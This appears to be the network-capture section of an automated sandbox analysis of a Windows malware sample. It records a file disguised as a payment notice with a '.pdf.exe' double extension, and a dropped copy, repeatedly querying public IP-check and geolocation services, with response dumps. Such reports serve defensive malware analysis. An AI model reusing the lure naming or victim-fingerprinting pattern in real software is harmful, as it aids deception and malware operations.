                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749711193.122.130.0807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:30.533427954 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:30.994785070 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 3393b0c267dd03fa2085816268c69d81
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749713193.122.130.0807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:31.639698982 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:32.105354071 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 363a8c70c042c6210594e31f72a618fa
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749715193.122.130.0807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:32.718421936 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:33.174551010 CEST320INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:33 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 4a19b960a1fea13c4d1c2ca5c6dc2f72
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749717132.226.8.169807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:34.121454954 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:35.101963043 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 3, 2024 09:16:35.130139112 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749721132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:35.643624067 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:37.442477942 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 3, 2024 09:16:37.446181059 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:38.949093103 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Oct 3, 2024 09:16:40.879057884 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:43.025032997 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749722132.226.8.169807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:35.755408049 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:37.599014044 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.749726132.226.8.169807220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:38.216753006 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:40.578283072 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.749731132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:43.636306047 CEST127OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Oct 3, 2024 09:16:44.963219881 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.749733132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:45.695868969 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:48.158533096 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.749736132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:48.999166012 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:49.864075899 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.749739132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:50.555437088 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:51.574934006 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.749741132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:52.232251883 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:54.093714952 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.749744132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:54.761554956 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:55.603022099 CEST272INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.749746132.226.8.169807664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 3, 2024 09:16:56.207454920 CEST151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Oct 3, 2024 09:16:59.044066906 CEST682INHTTP/1.1 502 Bad Gateway
                                                            Date: Thu, 03 Oct 2024 07:16:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 547
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749706188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:28 UTC682INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:28 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63582
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WMZ6EG1qyvEiOMN%2BDpEOYN0qyydnyLGeX2dIjD2GAE7CC%2Ble5EKjXhrW5%2FKXkuAUNR50oAebdDDFNJ1lXgt0AL9hVIjDAXtQ0%2BzfWWYPFKAxa%2B96v2jTzAbN%2Fu5pu6D6XUi5AS89"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb259be8f14267-EWR
                                                            2024-10-03 07:16:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749708188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:29 UTC678INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:28 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63582
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghpBT6cs2lveVAVYlxQ6zkmk5RZusbBWRY56gUH50cdP58biXjF0XRxan1Uulk%2BaeEDfRMlxUOUz9qZ99DqtX7Bb5UrhfJrqywZw9tCIpfjDgaGvUhj%2FN3%2FpMPVOTUh7yfLjM%2Fcg"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25a0fc1e4361-EWR
                                                            2024-10-03 07:16:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
